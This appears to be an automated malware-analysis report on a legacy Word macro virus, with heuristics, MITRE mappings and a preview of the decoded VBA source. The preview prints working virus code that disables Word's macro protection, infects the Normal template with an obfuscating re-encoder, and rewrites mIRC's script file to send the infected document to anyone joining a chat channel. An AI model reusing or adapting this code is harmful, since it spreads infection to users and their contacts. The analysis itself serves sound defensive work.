Verdict: MALICIOUS
Risk Score: 240
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1037.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
The sample contains VBA macros with AutoOpen and Document_Open subroutines, indicating it is designed to execute malicious code upon opening. The script attempts to save a file named 'Eugene.doc' and create an mIRC script to automatically send this file to chat room members upon joining. It also attempts to disable virus protection and save the document, suggesting an attempt to evade detection and spread.
Heuristics (6)
- ClamAV: Doc.Trojan.Bius-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Bius-1
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 161087 bytes |

SHA-256: f0982c63a1a615ce7b07675cf563652c7c5651ccec7a8d55ed2b23bf7034b4e9

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
End
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Sub DOCUMENT_CLOSE()
On Error Resume Next
Arsonists:
Randomize Timer
Options.VirusProtection = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
GI = 8: GJ = 10: GR = 2: NX = 21: GL = 2: LO = 5
X9 = Chr(34): C = Chr(13): CC = Chr(34)
O2 = Normal.ThisDocument.Variables(1).Value
O3 = ActiveDocument.Variables(1).Value
If Len(O2) > 8000 Or O4 > 18 Then
O5 = 1
Do While Not Mid(O2, Len(O2) - O4, 1) = "'"
O4 = O4 + 1
O7 = Right(O2, O4)
Loop
End If
MsgBox "There are many ways to be a winner. This is one of them." & Chr(13) & "For any comments, suggestions or questions contact:" & Chr(13) & "" & Chr(13) & "eugene@avp.ru", 0, "Arsonists (c) 1998 Eugene Kaspersky"
ActiveDocument.SaveAs FileName:="C:\Eugene.doc", fileformat:=wdFormatDocument, AddToRecentFiles:=False, ReadOnlyRecommended:=False
Kill "C:\mIRC\Script.ini"
Open "C:\mIRC\Script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick C:\Eugene.doc }"
Print #1, "n1=on 1:CONNECT: {"
Close 1
End Sub
L = Int(1 * 2)
If Len(O3) > 8000 Or O8 > 18 Then
O6 = 1
Do While Not Mid(O3, Len(O3) - O8, 1) = "'"
O8 = O8 + 1
O9 = Right(O3, O8)
Loop
End If
Set N1 = ActiveDocument.VBProject.VBCOMPONENTS(1).CODEMODULE
Set N2 = NormalTemplate.VBProject.VBCOMPONENTS(1).CODEMODULE
NI = N2.LINES(103, 1)
AI = N1.LINES(103, 1)
If Right(NI, 8) = "Vorg:" Then N3 = 1
If Right(AI, 8) = "Vorg:" Then N4 = 1
If N3 = 0 Then
Set N5 = N2
Set N6 = N1
Else
Set N5 = N1
Set N6 = N2
End If
If O5 = 1 Then V0 = O7: NE = O2: GoTo 9
For w = 1 To 100
N8 = N8 + C
Next w
With N6
For X = 1 To .COUNTOFLINES - 1
N7 = .LINES(X, 1)
If Left(N7, 1) = "'" Then GoTo 0
N8 = N8 & N7 & C
N9 = Int(5 * Rnd + 1)
If N9 = GR And X > 3 Then GoSub NA: U2 = "'" & NB & C: N8 = N8 & U2: U4 = U4 + Len(U2)
0 Next X
N8 = UCase(N8) & "END SUB" & C & "'"
RZ = Len(N8) - U4
End With
GoSub O1: V0 = NB
Do While Not Len(N8) = Len(NE)
q = q + 1
H = H + 1
NF = Mid(N8, q, 1)
H1 = Mid(V0, H, 1)
NG = Chr(Asc(NF) + Asc(H1))
If H = Len(V0) Then H = 0
NE = NE + NG
Loop
NE = NE + "'" + V0
9 LO = 5
GoSub NA: J1 = NB: GoSub NA: J2 = NB: GoSub NA: J3 = NB
GoSub NA: J4 = NB: GoSub NA: J5 = NB: GoSub NA: J6 = NB
GoSub NA: J9 = NB: GoSub NA: JA = NB: GoSub NA: JB = NB
GoSub NA: JC = NB: GoSub NA: JD = NB: GoSub NA: JE = NB
GoSub NA: JF = NB: GoSub NA: JG = NB: GoSub NA: JH = NB
GoSub NA: JI = NB: GoSub NA: JJ = NB: GoSub NA: JK = NB
GoSub NA: JL = NB: GoSub NA: VX = M: GoSub NA: JM = NB
GoSub NA: V1 = NB: GoSub NA: V2 = NB: GoSub NA: V3 = NB
GoSub NA: V4 = NB: GoSub NA: V5 = NB: GoSub NA: V6 = NB
GoSub NA: V7 = NB: GoSub NA: V8 = NB: GoSub NA: V9 = NB
GoSub NA: VA = NB: GoSub NA: VB = NB: GoSub NA: VC = NB
GoSub NA: NK = NB: GoSub NA: JZ = NB: GoSub NA: JV = NB
GoSub NA: TA = NB: GoSub NA: TB = NB: GoSub NA: TC = NB
GoSub NA: TD = NB: GoSub NA: TX = NB: GoSub NA: T4 = NB
GoSub NA: T5 = NB: GoSub NA: T6 = NB: GoSub NA: T7 = NB
GoSub NA: T8 = NB: WL = 10915: GoSub NA: T9 = NB
GoSub NA: JW = NB: NN = NC: GoSub NA: JX = NB: NN = 1
GoSub F1: R0 = F2: GoSub F1: RA = F2: GoSub F1: RB = F2
GoSub F1: RC = F2: GoSub F1: RD = F2: GoSub F1: RE = F2
GoSub F1: RF = F2: GoSub F1: RG = F2: GoSub F1: RH = F2
GoSub F1: RI = F2: NN = 0: GoSub F1: RJ = F2
For m1 = 1 To Len(VX): WW = WW + Asc(Mid(VX, m1, 1)): Next m1
GoTo NW
NA:
NB = Chr(Int(26 * Rnd + 65))
NL = Int((15 - LO) * Rnd + LO)
Do While Not Len(NB) = NL
6 NM = Int((122 - 48 + 1) * Rnd + 48)
If NM > 57 And NM < 65 Then GoTo 6
If NM > 90 And NM < 97 Then GoTo 6
NB = NB + Chr$(NM)
Loop
Return
O1:
NB = Chr(Int(26 * Rnd +
... (truncated)